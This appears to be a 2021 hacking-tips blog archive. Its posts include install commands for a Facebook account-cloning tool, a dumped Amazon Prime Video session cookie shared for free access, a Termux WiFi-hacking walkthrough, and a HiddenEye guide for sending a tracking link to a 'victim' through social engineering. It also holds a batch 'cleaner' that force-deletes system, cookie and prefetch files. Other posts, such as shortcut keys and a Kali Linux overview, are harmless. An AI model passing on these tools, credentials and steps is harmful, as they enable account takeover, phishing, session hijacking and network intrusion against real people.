Skip to main content

Posts

Showing posts from November, 2021

ABM cloning script

  * This Tool is about of random Facebook cloning. * You can cloning with B_api method and also nbr cloning. * You can cloning friendlist, public ID and also follower ID Cloning.   * apt update -y * apt upgrade * apt install git -y * apt install python2 -y * rm -rf Abm-Pro * git clone https://github.com/Tech-abm/Abm-Pro * cd Abm-Pro * pip2 install requests * pip2 install mechanize * python2 install.lxml

Amazon prime video for free cookie method 2021

  [     {         "domain": ".primevideo.com",         "expirationDate": 1669268908.314396,         "hostOnly": false,         "httpOnly": false,         "name": "session-token",         "path": "/",         "sameSite": null,         "secure": true,         "session": false,         "storeId": null,         "value": "\"q6yNKkxwdSIrjFFSU6B9pN2P/SW4ZhyTb2c+pzLgI57WEpZji9ZE1xkShW55APtwoXbnHeBwbInV8iHPve+0pnSrDenNZhCzSPnDXoZ811XXGCHYVX1sRgn6+SDtHJExxlXQ+r/h4xLo81SUXAayGj0qAV7lM4wCzz4LgXZen5zPv3UHPImGmzWwEo8weAkwVgcm1cZrM0UTZwQHAGntww==\""     },     {   ...

How to Hide Full Zip FILE Within an Image.

No Software or app Needed 🔴 Set up: 1. Must have a .zip or .rar compressor. 2. Willingness to learn. 👀 Steps: 1. Save the picture of choice to your desktop. 2. Make a new .rar or .zip folder on your desktop. 3. Add the files you want to hide into the .zip or .rar 4. Click start menu, run, cmd. 5. In Command Prompt type cd "desktop" with the quotation marks. 6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg ( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg) 7. Now there should be the outputed file name with a .jpg extension on the desktop. ( Do not close Command Prompt just yet ) 8. Double click it to open the picture and check it out. 9. When your done looking, and want to view the hidden files Type: ren outputfilename.jpg outputfilename.rar or zip Now you're done!

How to download Enrolled Corses From Udemy

  How to Download Enrolled Courses From Udemy.  I noticed it is very difficult to maintain Watch Videos online and code along... So I decided it should be better to share a Way for downloading Udemy Enrolled Courses Step 1 - Open this Link: https://awesomeopensource.com/project/FaisalUmair/udemy-downloader-gui Step 2 - Scroll down and Download the software.. Step 4 - Install it Step - 5 Login your udemy account in Udeler . That it.   Note - If someone need any guidance about any Language as a Beginner or Expert about  what courses he should want to take Feel Free to DM me

WHY DO HACKERS PREFER KALI LINUX ??

  Kali Linux is a Debian based Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security. 1. EASILY AVAILABLE Linux is an open source OS so it’s easily available on the internet and the applications that run on it are free of cost. 2. REBOOTING NOT NECESSARY Only Linux is that OS which doesn’t need to be rebooted occasionally to improve its performance, this  is also one of reason that Why do Hackers use Linux. 3. CAN BE USED FOR LONG TIME It doesn’t get slow or freeze up due to memory leaks, Linux OS can be used for years without any problem. 4. ALL APPLICATIONS ARE OPEN SOURCE In Linux, it will be easy for you to learn the source code and also all the applications of this Kali Linux are open source which is the benefit. 5. USER-FRIENDLY One of the reason for why everyone loves Kali Linux is it's user-friendly environment. Linux comes with the user-friendly installation as most of the Linux distributions are ...

Canva Pro for free 2021

 [Free]Canva Pro Lifetime Invite Link What is Canva? Canva is a graphic design platform, used to create social media graphics, presentations, posters, documents and other visual content. The app includes templates for users to use. The platform is free to use and offers paid subscriptions like Canva Pro and Canva for Enterprise for additional functionality. https://www.canva.com/brand/join?token=BLagePqWrx2e4godcTlTfg&brandingVariant=edu&referrer=team-invite

WiFi Hacking Command in termux 2021

 ~~ Only for rooted user.   ONLY FOR EDUCATIONAL PURPOSE. $ pkg update && pkg upgrade && install php $ pkg install python && pkg install python2 $ pkg install git && pkg install curl && $ pkg install clang && pkg install wget $ git clone https://github.com/esc0rtd3w/wifi-hacker $ cd wifi-hacker $ ls $ chmod +x wifi-hacker.sh $ sh wifi-hacker.sh > Y $ pkg install tsudo $ tsudo $ pkg install tsu $ tsudo $ cd $ cd wifi-hacker $ sh wifi-hacker.sh > Y ◆NOW SELECT FROM ABOVE ONE OPTION AND HACK WIFI ● 0 PRESS ENTER ● PRESS ENTER ◆ NAME OF WIFI YOU WANT TO HACK [ WHICH PROFILE IS AVAILABE IN YOUR DEVICE ] ● MAC ADDRESS OF VICTIM'S WIFI PROFILE ● CHANNEL NUMBER OF YOUR WIFI HACKING ● NOW SELECT YOUR ATTACK NUMBER

HOW TO MAKE OWN PC CLEANER SOFTWARE USING BAT PROGRAMMING

 ↓↓ SOURCE CODE ↓↓ @echo off echo PC Cleaner , Cleaning system junk files, please wait… REM displays a line of text del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*._mp del /f /s /q %systemdrive%\*.log del /f /s /q %systemdrive%\*.gid del /f /s /q %systemdrive%\*.chk del /f /s /q %systemdrive%\*.old del /f /s /q %systemdrive%\recycled\. del /f /s /q %windir%\*.bak del /f /s /q %windir%\prefetch\. rd /s /q %windir%\temp & md %windir%\temp del /f /q %userprofile%\cookies\. del /f /q %userprofile%\recent\. del /f /s /q “%userprofile%\Local Settings\Temporary Internet Files\.” del /f /s /q “%userprofile%\Local Settings\Temp\.” del /f /s /q “%userprofile%\recent\.” REM /f: force deleting of read-only files REM /s: Delete specified files from all subdirectories. REM /q: Quiet mode, do not ask if ok to delete on global wildcard REM %systemdrive%: drive upon which the system folder was placed REM %windir%: a regular variable and is defined in the variable store as %SystemR...

HOW TO TRACK EXACT LOCATION OF VICTIM | HQ METHOD

  THE TOOL WE WILL BE USING IS HIDDEN EYE ( NOT FOR PHISHING ) TO INSTALL HIDDEN EYE IN TERMUX --> apt install git --> apt install python php curl openssh grep --> git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git --> cd HiddenEye --> python HiddenEye.py AFTER THAT YOU WILL SHOW MANY  OPTIONS OF PHISHING WEBSITES * AT LAST YOU WILL SEE A OPTION "get victims location" SELECT THAT OPTION * AFTER SELECTING THE OPTION SELECT 2ND OPTION ( GDRIVE OPTION ) * AFTER THAT PRESS ENTER (YOU WILL SEE SOME TIOS IGNORE THIS ) * TYPE N WHEN IT ASKS FOR KEYLOGGER * AFTER THAT PUT ANY GDRIVE LINK (ANY) * AFTER THAT ENTER PORT , IN THIS I AM USING 1275 AFTER THAT IT YOU HAVE TO TURN ON HOTSPOT AND SELECT NGROK IN SERVER (FIRST ENABLE HOTSPOT AND THEN SELECT NGROK) * AFTER THAT SEND THE GENERATED LINK TO VICTIM ( HERE COMES SOCIAL ENGINEERING ) WHEN VICTIM CLICKS ON THE LINK YOU WILL GET HIS LOCATION ON TERMUX COPY THE GOOGLE MAP LINK AND PASTEI...

🔰How To Share Files Without Uploading Them On Internet | Share Links Without Uploading The Files.

 ðŸ”°How To Share Files Without Uploading Them On Internet | Share Links Without Uploading The Files🔰 ☑️ Want to share files without uploading them on web servers? ☑️Don't have much data to upload large files and send the links to your friends? ☑️Don't have time to upload and send link to the file to be downloaded? ☑️What if I say you can share any file link such as video, image, zip files etc without even uploading them on any of online file uploading site or apps, and your friend can download them easily. 🎀Yes, you read it right, we can share your files link without even uploading them on several websites or cloud storage providers such as MediaFire, Mega, G-Drive etc. The method on which we are discussing is just a magical method for those who can't afford large amount of internet data to upload larger files and take out their links through it. 😄So without wasting the time let's have a look to that method. But before starting let me tell you a short description of t...

Computer Shortcut Keys.

💈Save Your time with Short Cut 💈 With computer short cut key it's very helpful for beginer to advance ✅ Ctrl + A - Select All Ctrl + B - Bold Ctrl + C - Copy Ctrl + D - Fill Ctrl + F - Find Ctrl + G - Find next instance of text Ctrl + H - Replace Ctrl + I - Italic Ctrl + K - Insert a hyperlink Ctrl + N - New workbook Ctrl + O - Open Ctrl + P - Print Ctrl + R - Nothing right Ctrl + S - Save Ctrl + U - Underlined Ctrl + V - Paste Ctrl W - Close Ctrl + X - Cut Ctrl + Y - Repeat Ctrl + Z - Cancel F1 - Help F2 - Edition F3 - Paste the name F4 - Repeat the last action F4 - When entering a formula, switch between absolute / relative references F5 - Goto F6 - Next Pane F7 - Spell Check F8 - Extension of the mode F9 - Recalculate all workbooks F10 - Activate Menubar F11 - New graph F12 - Save As Ctrl +: - Insert the current time Ctrl +; - Insert the current date Ctrl + "- Copy the value of the cell above Ctrl + '- Copy the formula from the cell above Shift - Offset Adjustment for...